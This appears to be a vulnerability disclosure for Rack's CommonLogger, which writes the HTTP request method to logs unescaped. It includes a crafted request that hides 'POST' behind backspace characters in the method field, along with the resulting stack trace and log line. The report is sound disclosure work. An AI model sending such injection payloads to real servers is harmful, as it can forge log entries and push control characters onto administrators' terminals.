Escape Sequence Injection vulnerability in Rack

Dangerous bug in commonlogger of rack that allows to inject escape sequences in logs, the same bug alredy closed in webrick https://www.ruby-lang.org/en/news/2010/01/10/webrick-escape-sequence-injection/ Logger processes the query string correctly, but request metod printing as is. https://github.com/rack/rack/blob/master/lib/rack/common_logger.rb#L50 Triggering request: ``` GET\b\b\bPOST /sign_in?test1=1\b2 HTTP/1.0 Host: 127.0.0.1:4567 ``` Result: ``` Rack::Lint::LintError: REQUEST_METHOD unknown: POST /usr/local/bundle/gems/rack-2.2.3/lib/rack/lint.rb:21:in `assert' /usr/local/bundle/gems/rack-2.2.3/lib/rack/lint.rb:340:in `check_env' /usr/local/bundle/gems/rack-2.2.3/lib/rack/lint.rb:44:in `_call' /usr/local/bundle/gems/rack-2.2.3/lib/rack/lint.rb:38:in `call' /usr/local/bundle/gems/rack-2.2.3/lib/rack/show_exceptions.rb:23:in `call' /usr/local/bundle/gems/rack-2.2.3/lib/rack/common_logger.rb:38:in `call' /usr/local/bundle/gems/sinatra-2.1.0/lib/sinatra/base.rb:253:in `call' /usr/local/bundle/gems/rack-2.2.3/lib/rack/content_length.rb:17:in `call' /usr/local/bundle/gems/rack-2.2.3/lib/rack/handler/webrick.rb:95:in `service' /usr/local/bundle/gems/webrick-1.7.0/lib/webrick/httpserver.rb:140:in `service' /usr/local/bundle/gems/webrick-1.7.0/lib/webrick/httpserver.rb:96:in `run' /usr/local/bundle/gems/webrick-1.7.0/lib/webrick/server.rb:310:in `block in start_thread' 172.19.0.1 - - [29/Nov/2021:12:19:06 +0000] "POST /sign_in?test1=1%082 HTTP/1.1" 500 950 0.0006 ``` ## Impact inject malicious escape sequences to its logs, making it possible for dangerous control characters to be executed on a victim's terminal emulator